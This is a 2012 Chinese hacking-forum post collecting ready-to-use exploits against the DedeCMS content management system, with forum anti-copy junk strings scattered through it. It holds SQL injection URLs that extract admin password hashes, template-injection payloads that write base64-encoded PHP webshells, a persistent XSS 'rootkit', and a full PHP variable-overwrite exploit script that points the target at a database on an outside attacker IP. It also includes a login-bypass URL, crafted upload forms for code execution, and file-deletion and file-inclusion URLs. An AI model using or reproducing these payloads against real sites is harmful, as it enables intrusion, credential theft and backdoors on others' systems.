中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]

作者: admin 时间: 2012-10-18 10:42
标题: dedecms漏洞总结

Dedecms 5.6 rss注入漏洞5 O3 q1 N% F/ D9 `  ^' y7 e; v
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1  g* r9 ^. A) W4 p

$ t) ^& Y  l* R8 C% f# i7 _* [6 r8 r- b7 `5 M4 H
& u4 M' N1 V$ i

4 B% @( T( a6 j& f/ A5 I# v8 R, m$ U, ^( b! I3 i

3 \# Y, `9 F1 P% P$ c3 q" t* L
& B4 M  h6 s0 \5 p& @3 F) v6 Q+ p& R8 H
DedeCms v5.6 嵌入恶意代码执行漏洞
6 y) Q, F, m4 J9 h注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
9 U" x0 [/ c0 c8 W发表后查看或修改即可执行
6 n; t* `4 O7 \1 W' ba{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
' J1 D$ o; u6 Z! \& I+ d生成x.php 密码xiao，直接生成一句话。) J2 V# d  Q& u
' T! Q& q! m- ]# u3 ^: f7 m0 c
$ m9 Y: b) u  j: ]/ f/ }
8 i5 W3 L$ c3 `/ P
' |( w; z" ?" Z# V6 C7 B
. l. B4 G4 e. K& o$ m' s' c1 x

! c' b, Z& o) Y) u1 ~, D, c5 n: k; [- s
0 m. o6 {' W5 h3 N
Dede 5.6 GBK SQL注入漏洞, d1 Q6 P9 R6 }4 D) D# M
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
5 ?( \4 b- Z7 d) J  B) ?/ uhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
( v5 J3 b: P: Fhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
4 j' a: |' w0 F) L% |# T, Z4 c7 B; _# Y$ ?5 k$ y
! d8 {* `0 y$ o/ Y7 @# y
' B+ F  }) ]0 v: V+ q; I& w
) l% o# p. [. \$ c; z
) ]1 R/ M4 C; J" D& `: k

' v, |- d$ W# ^; L$ V( X0 LDEDECMS 全版本 gotopage变量XSS漏洞
  t& Y4 w7 k  K& R" U! i5 T1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
& ~: v1 B; f) G+ |http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
% H: X" W. |. _& g" I
, o* g) G) H9 x$ ]) W; I8 M1 R7 \2 q# K
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。 ( R* m) Z+ q# z4 ~$ Y+ N
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell
9 b! E9 H0 T3 B#!usr/bin/php -w9 c6 U( N) m" O3 n
<?php
  Z; ~+ v, V  D; H2 _3 serror_reporting(E_ERROR);
6 N5 }& k5 d% g; @( g( lset_time_limit(0);
- h' n6 X: E6 E) _1 xprint_r('  ~5 J$ q; X  H' E( Q- f# t. J
DEDEcms Variable Coverage
" j% j0 i) H- @+ E! d% \5 q5 }Exploit Author: www.heixiaozi.comwww.webvul.com
);
" N0 n8 y. o: i3 iecho "\r\n";
# s$ K. I; Z" ~( t  \if($argv[2]==null){$ O# I9 a# Q$ d; f# K
print_r('
/ _" R0 k2 g" X8 @1 S- ^7 s  Z# y+---------------------------------------------------------------------------+1 {5 ?( R# t+ v0 |+ U( V
Usage: php '.$argv[0].' url aid path
4 d, L7 f: z  E0 k/ Maid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/. U. ]; J$ p2 n/ r' X
Example:
) X" g* j4 ?+ dphp '.$argv[0].' www.site.com 1 old  g" q9 h4 q8 k8 u. K9 \- X
+---------------------------------------------------------------------------+/ z& i5 `/ x+ ?8 m- ^
');
" E7 I6 j1 M' j( Q( Q4 _  H  @exit;
7 O' _7 i$ ?1 C7 Y: z}
: B; m* H8 E. I7 W1 v' k$ w$url=$argv[1];
& K' v" C6 _: s1 D. M$aid=$argv[2];* L: f1 {+ W3 E4 |( ]5 x: l# J
$path=$argv[3];/ H, }9 s* E$ j# _+ L
$exp=Getshell($url,$aid,$path);
' ]! {; z! b4 |4 ~8 O" K% C$ ^# Y( i/ rif (strpos($exp,"OK")>12){
! B# v! K0 N% c4 I! Y& f9 ~echo "
. g4 n+ u( y0 C) EExploit Success \n";2 H8 H  t: `2 g
if($aid==1)echo "
* U+ k8 e7 W. M* F; `, nShell:".$url."/$path/data/cache/fuck.php\n" ;) _# f( z) O% c6 p
/ d! D* p5 x# {2 J7 E. Z
7 R& L( {5 m( o1 F/ l
if($aid==2)echo "+ N$ t+ D1 d7 y% V4 Z! Q8 N
Shell:".$url."/$path/fuck.php\n" ;1 x0 m( C4 I' N4 O$ k6 n
$ \8 @$ z% _1 w& d3 m

2 `8 t" S* P! t# f3 G  A0 \9 K  @if($aid==3)echo "% g$ @. I) o' o# i( C( {; h
Shell:".$url."/$path/plus/fuck.php\n";
/ ~% ^* k5 V) ~' U9 U
. L& H: c' c% s, J3 K
1 X1 F" g% @# h6 u5 Q% ?}else{. X& H; V7 i; _
echo "
$ @# f7 l6 J9 q. C8 V9 T! XExploit Failed \n";5 ^- l6 U4 F2 u( Y. H( E" \
}! [3 t% J; ^0 x! W$ C
function Getshell($url,$aid,$path){5 R( {4 Q' w& a" \9 l
$id=$aid;
" i2 X% S' K6 V% z3 E$host=$url;4 r# G/ C; T# A: n0 x4 ?* W$ q
$port="80";) E  S5 H! c( @8 l) C3 ?8 |9 |
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";" c* N% d6 C6 X- u
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";  W. K6 [4 w+ A. Y: W! N/ l5 _
$data .= "Host: ".$host."\r\n";
$ s( K" Z; o! M0 @' ]$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
- M) T6 [& E9 s7 a$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";* W$ X: |# z& A( }2 j
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";3 W2 c/ D, T! [, L
//$data .= "Accept-Encoding: gzip,deflate\r\n";+ O1 n$ F9 h4 @3 |  J
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
; o+ @( t8 r; x& R0 s/ U# H3 ^2 F$data .= "Connection: keep-alive\r\n";
  r; ^0 ]1 d9 G9 R/ @, C3 U, T9 O$data .= "Content-Type: application/x-www-form-urlencoded\r\n";# s1 O& t  Q% X! u3 V- I2 @  h
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";) J& `% M! d7 _7 R% v7 A7 `
$data .= $content."\r\n";
) f) M7 ^' O5 [9 r+ x+ B! X$ock=fsockopen($host,$port);) A2 P- e6 [: Q( T4 B
if (!$ock) {- H* B4 r3 D# n4 [2 l
echo "
5 H$ Q" c4 V$ o5 T/ lNo response from ".$host."\n";
1 l# I1 s# ]4 L- K) f$ O}
! ?" c- I, j7 i" i3 N- C& J- Hfwrite($ock,$data);
# A6 s) J5 x& }while (!feof($ock)) {1 G$ Y2 X5 d! F% l0 A% k9 v4 V
$exp=fgets($ock, 1024);
# X) ?& N$ {# r6 ^% a0 wreturn $exp;6 x% m5 t2 {: ~% k1 U1 [* y2 \
}3 W0 P, E1 j. r! k
}
5 Y# y9 s. P' F; i2 k, ^
5 u- A% e+ F: H/ q3 \, ~; t/ A4 V5 \# Y; Y
?>8 |5 O+ B9 m7 y

+ i8 X( U" X1 \5 _4 m3 v0 _+ e. V5 k  H1 j! \, O' F
; D- R* Q# z: N

' X' N  F* G$ T; A6 ]+ L; r* Z: T' R) h6 ]

4 P5 R' d( ]! N2 L+ ~, W. u& d# G' [. k2 ?( ?

4 X) q8 h3 `: E- s$ Q) d2 ^
: E! u8 A4 E5 Z' P' ?4 X5 n7 A+ m& T
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)9 f. X  M$ F9 L; j! j( \, t
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
4 M& [9 Q7 A: F' T
! L- F9 k# A, _/ |& ]7 c4 P
# D+ a0 }+ \5 @5 F& ~0 g6 H把上面validate=dcug改为当前的验证码，即可直接进入网站后台
" U, ^4 {' C& d* _. F6 _' @/ ^4 L, o: m! }7 n+ B
  j: l: [% [7 t' v$ _2 G
此漏洞的前提是必须得到后台路径才能实现  Q- b# I  h7 D9 n* X' H$ O' I
5 }& D/ f# a7 C! F2 Z1 i
. A+ n! H  ^7 u5 b9 G
: ?4 B8 ~9 T; M' O3 Q/ u
# v4 K4 C2 C" r+ X8 K

5 L8 |3 w0 g* \& B7 ~2 |
( Y9 d+ J; `9 k3 h4 ]4 L5 k, V. p

3 O3 d/ D( A# y8 e8 V3 i" \: Y8 q0 T/ D
5 J% o3 z( [+ V/ M
Dedecms织梦标签远程文件写入漏洞. L8 H# C" {- {5 X) h8 ]0 A
前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
* W- p, s+ X; K* D" E$ L! p' B# w* \+ `# i, x" N7 f! v1 E
/ T4 m9 d, R! z, J1 ~! v' D
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch">4 d1 V% V' ^- q$ A. @
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />" R, @6 ~5 Z! F5 Y
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />( i! `% {0 n4 g& x
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />) I# B9 O( a& y5 f5 f
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
( a; Q- W6 K! d8 o) e<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
; ~- o* P  o5 E) }* y+ L<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />/ @! J# k3 D8 O  N
<input type="text" value="true" name="nocache" style="width:400">8 s/ j- [5 S5 t# I( F
<input type="submit" value="提交" name="QuickSearchBtn"><br />; F0 S; J( b! H2 B/ J8 Z
</form>9 P" V+ l3 _, P/ P$ l2 m4 J# J) p+ K
<script>$ @0 H3 Y6 g% k5 _; o  ^
function addaction()" d3 D( K  r' X, G2 y
{* D) ?9 i* }) y6 L, _1 @, T
document.QuickSearch.action=document.QuickSearch.doaction.value;( b7 l% v# ~- ~3 d( q, T
}
' B1 E% b4 V7 A; B+ T  w</script>7 {6 `/ @8 c9 X& C( O
- p+ H8 a0 W6 C6 S& L: \4 o

& H7 u7 o  E! ]  p; D3 ^8 }; s6 i
/ L- e( {4 C9 y! @9 X6 A! Q: K" Y) M# _0 n" q, R8 J

% x1 W6 N- E  p3 O
& H) K: E, L7 `. u, ^; C. M& h( N6 z, C) R3 E  P
. y; P- s& X: c% s
. r  J8 K8 @/ _1 f! \3 m
2 \5 y. `8 L+ |0 j6 Z: c+ d& ^
DedeCms v5.6 嵌入恶意代码执行漏洞: j8 P! l  W, K) U2 L! }
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行" e( p* h- _' c" O! J7 T
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
! T$ O, a! R5 x7 |% M& g2 A/ V生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
3 Y2 P4 O( H) C( [' w+ J0 Q7 D# `5 U( jDedecms <= V5.6 Final模板执行漏洞
9 H- h& {( ^8 J( O注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
0 ?3 o6 L, v5 Q, kuploads/userup/2/12OMX04-15A.jpg9 w" R! e1 e& R4 d; d

" u) W# b1 t: W2 \7 ?/ b" C
/ j* {1 \* J, O! V模板内容是（如果限制图片格式，加gif89a）：
+ e) c9 M1 u9 W- a0 S, P3 R! ^{dede:name runphp='yes'}
2 T. p" f) |0 l) c4 L$fp = @fopen("1.php", 'a');' ^% D5 ^, f1 M
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
0 }1 J" z; d7 g3 I( ?! u. y@fclose($fp);
1 v1 l  N+ s6 `{/dede:name}
1 H. h% P4 [" X6 H2 修改刚刚发表的文章，查看源文件，构造一个表单：7 w: K" s- b7 {. Q) U
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
% J& _: m* O- g$ l" t4 T+ I* U. F# e<input type="hidden" name="dopost" value="save" />
6 G: H* b" `  c- X9 j9 D<input type="hidden" name="aid" value="2" />
, A; i/ o& D3 S. G2 Z6 k<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
" O) O4 u. n% Y" X& y<input type="hidden" name="channelid" value="1" />
$ l7 P6 m' H% P, T: w6 D<input type="hidden" name="oldlitpic" value="" />: }% V% `' `# }" v4 r* f2 n
<input type="hidden" name="sortrank" value="1275972263" />
& b$ v. M( ~, l) K4 m1 m, B
2 {- _' y# B1 u! D5 v2 N+ T, K+ i- O2 u0 n  _6 G
<div id="mainCp">7 H' a5 ]4 J  v- {/ k& p: \6 W
<h3 class="meTitle"><strong>修改文章</strong></h3>* S. i* U- y8 f( m4 a

; `7 l( O; f" W: O6 K% ?. q5 I- N9 a% o, w' ~0 k5 j. S
<div class="postForm">. {" s: A) G% K, ?/ ^/ j
<label>标题：</label>
' J. h8 M* E4 W6 }  V; ^& v<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>5 G# U3 Z% G" H# d; F
. s0 n/ c: J0 L# s/ @3 e! r8 h

+ o* {1 j  _8 J<label>标签TAG：</label>! n; U4 v/ B3 n; i% U7 ^
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)1 ]& j4 R5 d8 \6 o
0 Q, N& [8 i8 ^

* G6 q: ?/ a6 a<label>作者：</label>2 U1 e2 R" s1 k# w2 X; X8 W# G
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
$ s1 J2 z* W, u. O9 }. j7 E, M7 ^( c' o4 d5 k: A0 g6 ]
6 H4 K6 }4 m3 R8 f, b: P+ C
<label>隶属栏目：</label>2 M6 x: o5 T) P- x
<select name='typeid' size='1'>5 X  w2 c9 L1 m* V  }$ B7 E8 `
<option value='1' class='option3' selected=''>测试栏目</option>4 {8 u3 V; t+ E. ^# n7 F1 J1 h
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)7 g/ {4 W- w2 t

6 B6 v+ X9 v' z7 j& E1 l5 O+ V, K
<label>我的分类：</label>
3 {2 \/ h& f# f% r0 @<select name='mtypesid' size='1'>- E1 U. M7 K, G/ y0 b
<option value='0' selected>请选择分类...</option># f" ], k$ W$ I# S7 L( H
<option value='1' class='option3' selected>hahahha</option>
2 w8 v+ I; W5 d+ k" T$ N</select># l4 e3 C) I- y. D4 c- o- G

. q. m$ M: b1 a' `# U
0 t7 H% G/ p* |" r) Z<label>信息摘要：</label>0 G4 K; H0 u6 f" s. |- i
<textarea name="description" id="description">1111111</textarea>
8 c9 a7 Y) B; ]6 |5 [  }(内容的简要说明)# x2 [, S- }# x

+ ~8 R) T% H9 L0 e( u+ O3 R. i3 H4 \+ d( T
<label>缩略图：</label>4 Z( r4 s8 M& z  x/ u! h1 ]
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>1 X9 E, Z3 a" N( b& F$ p

6 [9 p  K% c' Z; g1 H! B3 b  g  w" {+ O$ X" H5 B2 u/ V; K
<input type='text' name='templet'$ D5 O% {4 b; P' u
value="../ uploads/userup/2/12OMX04-15A.jpg">
, ]/ Y" T: T& a8 c; k<input type='text' name='dede_addonfields'
" z& @# [3 `% ^& P2 nvalue="templet,htmltext;">（这里构造）% f# C# G5 N5 I, g$ f, y
</div>( L1 D( P/ p8 z( [1 y) T1 N+ s

, R# c4 b* ?9 F0 m  ]. G! P$ n, ~. l9 d

- i$ \( [3 ]3 A5 w2 |/ y<h3 class="meTitle">详细内容</h3>
, B+ q; E' r9 ?. i7 e% t6 ~9 k2 e& m  J0 B# ^# s
9 X: B' l4 k& a  k
<div class="contentShow postForm">$ _/ f0 r! E& c& y. O1 t
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
+ A& ~3 O1 b5 ?2 Q' V9 W0 s, g3 Y, T' `- b1 ~7 N
* j  X) j& ]$ O
<label>验证码：</label>$ j! [$ ?6 h$ Q* t: R/ r
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />- A5 K. Y; o! y! U9 a' X) @
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
4 E3 s% y$ n- i: k
* S( e2 j$ M. l- e% l0 n+ e2 R6 r* A% S3 \  e9 g
<button class="button2" type="submit">提交</button>1 `% {1 w) [; f3 i
<button class="button2 ml10" type="reset">重置</button>
3 o6 v8 O4 M8 D8 g* x# P9 v: ^$ y</div>
% c/ {( F0 Z6 y. g- }
$ T) U2 `" H$ a/ ~5 s5 c- q% N7 e; Q5 v7 }
</div>4 h& q8 W8 i' ^. Y: z
0 @& H& H: n/ C2 x: h, X! ?

; ]) J" |4 T9 G7 p9 ]</form>8 M0 g9 f) Q% d
* h$ }* f3 }, p! l
7 m( W4 _0 H% d6 O6 h8 J/ ]
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：# O6 _, q# X  X2 X
假设刚刚修改的文章的aid为2，则我们只需要访问：" _3 C' |2 ]; T; R, {' J
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php9 K, Y3 H4 n/ i2 j: F0 J! Y
$ `0 S: [- z3 [; Y
7 M" c1 s2 d* a" E; G/ m0 m0 A$ h0 {
7 K$ h' v) Y6 W

% Y' z4 V) I) P- Q* i
- m  K2 d9 q* n. w) t& q# l  G
+ _6 D( g- o- U, H
# t# a! ]& d4 k" j9 Q- L' X1 l

4 b" C# \) n% A
9 I; o' j3 {! u- R' m, r- T* K! R0 k7 L/ V% B1 ?8 [+ d

0 x6 ~" m& W6 U' D3 }DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
. A- Q. A( e0 E; u" mGif89a{dede:field name='toby57' runphp='yes'}, g" f- i3 O" Q' J; j7 k7 @8 K" J
phpinfo();
+ e; w' N; x& M. G{/dede:field}! m3 Z9 u1 Y9 r( ^
保存为1.gif/ \' |7 x3 L4 D8 k! @9 L3 F* ^
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
5 S+ Z+ T4 \8 ~* D  c<input type="hidden" name="aid" value="7" />
& ~- ?4 ]! _" s: v; v9 ?0 k( O<input type="hidden" name="mediatype" value="1" /> 5 `2 o) Y6 F, K) c$ C
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> - f1 _2 H! q' b5 e" a
<input type="hidden" name="dopost" value="save" />
' A; s  E& B. O( V/ X6 \<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ! w) }6 |- G8 H9 @0 ~- w" j. p
<input name="addonfile" type="file" id="addonfile"/> & v, |, X( _1 K; k* s% n
<button class="button2" type="submit" >更改</button> , ]; o# N2 [! u$ S- M! }
</form>
3 }: D8 P3 m8 `" ]$ x  V  `, _  b) S7 q7 w2 J
* n0 w: C) _% [/ w4 Q+ c
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif; u: b2 m% H4 D( o2 @" _& ]
发表文章，然后构造修改表单如下：5 d/ B3 Y0 A1 W6 C3 Q# E- G5 `
) o- t5 ^3 e- n& y. [: V6 y
  P  ?' j9 k4 L( E* ]# m
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
6 m7 D6 }" j% M% s2 b+ R<input type="hidden" name="dopost" value="save" />
# ?% n, d  [/ \<input type="hidden" name="aid" value="2" />
) F  _# A0 E  j+ s0 F<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 6 C4 F. Q& V4 N. |
<input type="hidden" name="channelid" value="1" />
+ P* c% \+ H& Q" Y4 T- {! _<input type="hidden" name="oldlitpic" value="" />
2 k8 v2 b1 s3 T+ ^. P8 v( M9 M8 F<input type="hidden" name="sortrank" value="1282049150" /> 6 |# v8 S" o% d3 n2 f& x# M
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> - a  G4 A  P; l! ^+ F+ _
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
% d1 P: q$ \( e7 d<select name='typeid' size='1'>
2 V3 w& \# W' s<option value='1' class='option3' selected=''>Test</option> 5 }/ w; f, Q' [5 \1 S6 |' Q$ H
<select name='mtypesid' size='1'>
" n5 `: B. `: ?9 A/ I<option value='0' selected>请选择分类...</option>
$ N, T' V  [( Z* F; f2 a) }<option value='1' class='option3' selected>aa</option></select> 3 ]9 @( y& z5 A: x+ _) ?8 D- F
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
3 l' A% Z4 l5 ^; R( n0 |$ H6 W<input type='hidden' name='dede_addonfields' value="templet"> 6 T, f% _4 z& x  n
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
) T' z" E/ d+ T<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
3 _+ T3 Q% u0 H  t8 i5 s5 B<button class="button2" type="submit">提交</button> ( \% B2 e) n) B8 h
</form>
! ?/ c+ [2 _$ I  V" O" \+ J. S( i. P8 O* l! L3 x( y
" p9 L8 E/ Q6 w1 g- W) E8 C6 l5 l
& p2 _5 e* C2 J! b% I
% o* l9 [. h  X: c* C& M! b
4 G; [0 a7 @" B) o
) C3 E+ T6 [; G% C

  ~5 c8 q: G; \2 b
: m" S* m6 }# _9 O7 D/ g  y) m. v' c0 B* k! K" P5 t+ t- ?

2 q2 \+ W2 o8 Z+ B0 E+ S$ V3 t7 \0 i8 p

- \0 \; {& n0 h4 k  x织梦(Dedecms)V5.6 远程文件删除漏洞, P3 Z1 }( k0 T2 T  B
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 " f4 ^0 F# V) @4 z, B
http://www.test.com/plus/carbuya ... urn&code=../../* P& F2 z) G7 l  c. E: x8 q0 x
7 R9 b7 t7 q4 i3 n( d% h

3 Z5 l, A" ?% y& O( E. _* _) c, @3 G3 f3 R: f1 o8 N
6 m* f. S' W% X0 e+ t

# j4 c; @1 [; e' z" O) _" [) K6 {$ C$ \/ l- J4 ]* w% C
1 I$ c/ a5 |4 I; B- d

: p6 Z2 k. z! |: v9 d" p2 G+ X3 z. \4 L9 a8 I/ n( ]) z

& i( \* P9 \$ J7 V" |1 ]$ @9 iDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 6 ^6 d. f1 g* @4 k2 h
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
6 i2 h% r% z1 z7 t3 K密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5, Z5 G( V2 e( v0 A

5 Y/ Y$ U" c( Y4 N1 U9 Q$ w4 j
6 m+ i) E" a/ \/ p
1 Q4 Y5 v6 K- j5 y) X
9 x0 Q, I2 N4 l& ^' o% Q
3 g9 L4 S5 y  I# g* Q7 x8 J) R* D8 k! j  y4 |3 ?

- K  D" n/ r9 d& G
+ A( f( j; O2 ]( ]9 ^# E' _& D  s, F; [1 N( m$ r# O
7 n  l4 b* c1 i8 q" E7 P, k
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞: H' Q0 C2 E8 r% d& J2 P; ]
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
$ O; }2 M4 a: A6 x& D
% \# i* P4 z, f- F7 G" z4 \
9 o* D6 D+ q6 U- c3 m' N! S, i/ I# C/ p" \; X: E( J7 e, `

! a# V% V3 B- d. d4 _4 q
, t2 g& b! M# Q! E& N! b+ g
/ ^9 O" ?( T4 E' |/ S9 _' |! x' C* }+ B# j. c, {- R& T3 n$ ~' R( D

* t  _* S# E& j0 @4 V& v, x. p7 [! U

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
. A7 F5 f; T$ C% `& p5 G* o% u) {<html>
4 }0 }2 |: k# d4 j9 H<head>- M$ A; [7 p  u( p/ ~1 q
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
3 R" n% c* u( L3 P- w* w+ T</head>$ _6 R+ X8 X3 P8 j$ @6 Q
<body style="FONT-SIZE: 9pt">
* r( W. C- ]$ f8 c3 z1 d) ?* [! R---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />5 a9 j- Z! q5 s. v8 x3 ^2 I8 |
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  K1 H9 H, Z! P& \9 p$ V<input type='hidden' name='activepath' value='/data/cache/' />0 b+ l0 O/ O- \2 ^2 e6 T
<input type='hidden' name='cfg_basedir' value='../../' />
2 w8 W# v: C# c9 Z* E<input type='hidden' name='cfg_imgtype' value='php' />2 F9 X1 d5 X: N6 A$ n! _
<input type='hidden' name='cfg_not_allowall' value='txt' />
7 o. h9 b# u, o: b, w<input type='hidden' name='cfg_softtype' value='php' />
$ N1 q2 M" @" f# C) |) s<input type='hidden' name='cfg_mediatype' value='php' />" J# @) \" G3 f8 V2 N. t
